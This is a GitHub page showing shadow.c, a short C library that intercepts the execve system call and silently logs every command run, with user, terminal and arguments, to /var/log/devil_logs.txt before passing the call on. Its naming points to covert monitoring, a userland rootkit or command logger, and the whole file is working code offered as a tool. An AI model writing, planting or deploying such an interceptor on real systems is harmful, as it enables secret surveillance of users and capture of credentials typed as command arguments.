-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathshadow.c
More file actions
66 lines (51 loc) · 1.75 KB
/
shadow.c
File metadata and controls
66 lines (51 loc) · 1.75 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <dlfcn.h>
#include <time.h>
#include <pwd.h>
#include <sys/types.h>
#define LOG_FILE "/var/log/devil_logs.txt"
static int (*original_execve)(const char *, char *const[], char *const[]) = NULL;
const char *get_tty() {
char *tty = ttyname(STDIN_FILENO);
if (!tty) tty = ttyname(STDOUT_FILENO);
if (!tty) tty = ttyname(STDERR_FILENO);
return (tty) ? tty : "hidden shell";
}
void log_command(const char *pathname, char *const argv[]) {
FILE *logfile = fopen(LOG_FILE, "a");
if (!logfile) {
logfile = fopen(LOG_FILE, "a");
if (!logfile) {
perror("Failed lol!!");
return;
}
}
time_t now = time(NULL);
struct tm *t = localtime(&now);
char timestamp[32];
strftime(timestamp, sizeof(timestamp), "%Y-%m-%d %H:%M:%S", t);
struct passwd *pw = getpwuid(geteuid());
const char *user = (pw) ? pw->pw_name : "unknown";
const char *tty = get_tty();
const char *cmd_name = strrchr(pathname, '/');
cmd_name = (cmd_name) ? cmd_name + 1 : pathname;
fprintf(logfile, "=============================================\n");
fprintf(logfile, "[%s] USER: %s | TTY: %s | CMD: %s", timestamp, user, tty, cmd_name);
for (int i = 1; argv[i] != NULL; i++) {
fprintf(logfile, " %s", argv[i]);
}
fprintf(logfile, "\n=============================================\n");
fclose(logfile);
}
int execve(const char *pathname, char *const argv[], char *const envp[]) {
if (!original_execve) {
original_execve = dlsym(RTLD_NEXT, "execve");
}
log_command(pathname, argv);
return original_execve(pathname, argv, envp);
}